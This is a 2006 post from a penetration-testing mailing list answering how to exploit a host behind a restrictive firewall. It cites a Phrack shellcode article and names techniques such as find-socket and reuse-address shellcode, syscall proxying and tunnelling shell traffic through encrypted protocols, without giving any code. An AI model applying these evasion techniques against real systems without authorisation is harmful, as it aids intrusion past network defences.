Penetration Testing mailing list archives
RE: pushing exploits through the Firewall
From: c.ehlen () bull de
Date: Tue, 14 Feb 2006 12:31:49 +0100
"Mike Gilligan" <mikewgilligan@h An: pen-test () securityfocus com otmail.com> Kopie: Thema: pushing exploits through the Firewall 12.02.2006 09:42 Hi Mike,
I'm curious how it would be possible to launch the exploit against the server when a packet filtering device and stateful inspection Firewall sit
between the pentester and the vuln host. It would seem at first glance
that
this is not a viable option. How else might one go about exploiting the vuln?
In issue 62 of Phrack magazine you can find an article called "Advances_in_Windows_Shellcode" by sk. (http://www.phrack.org/phrack/62/p62-0x07_Advances_in_Windows_Shellcode.txt) Here is an abstract of the abstract: "Firewall is everywhere in the Internet now. Most of the exploits released in the public have little concern over firewall rules because they are just proof of concept. In real world, we would encounter targets with firewall that will make exploitation harder. We need to overcome these obstacles for a successful penetration testing job. The research of this paper started when we need to take over (own) a machine which is heavily protected with rigid firewall rules. Although we can reach the vulnerable service but the strong firewall rules between us and the server hinder all standard exploits useless." If we assume that the firewall: -blocks all port except for listening port of the service -blocks all outgoing initial traffic from the target you can still can exploit the target with shell- and/or payload with these techniques: -Find socket shellcode -Reuse address shellcode -Syscall Proxying If the filter device is an DPI/ALG system, you can encapsulate the shell- communication in the payload of encrypted (stenographed) real-world protocol packets or maybe use some kind of evasion/mutation code. I think you will find this exploiting techniques in most exploit frameworks. Regards, Christian ------------------------------------------------------------------------------ Audit your website security with Acunetix Web Vulnerability Scanner: Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are futile against web application hacking. Check your website for vulnerabilities to SQL injection, Cross site scripting and other web attacks before hackers do! Download Trial at: http://www.securityfocus.com/sponsor/pen-test_050831 -------------------------------------------------------------------------------
Current thread:
- pushing exploits through the Firewall Mike Gilligan (Feb 12)
- RE: pushing exploits through the Firewall Enrique A. Sanchez Montellano (Feb 12)
- <Possible follow-ups>
- RE: pushing exploits through the Firewall c . ehlen (Feb 15)
- RE: pushing exploits through the Firewall Evans, Arian (Feb 15)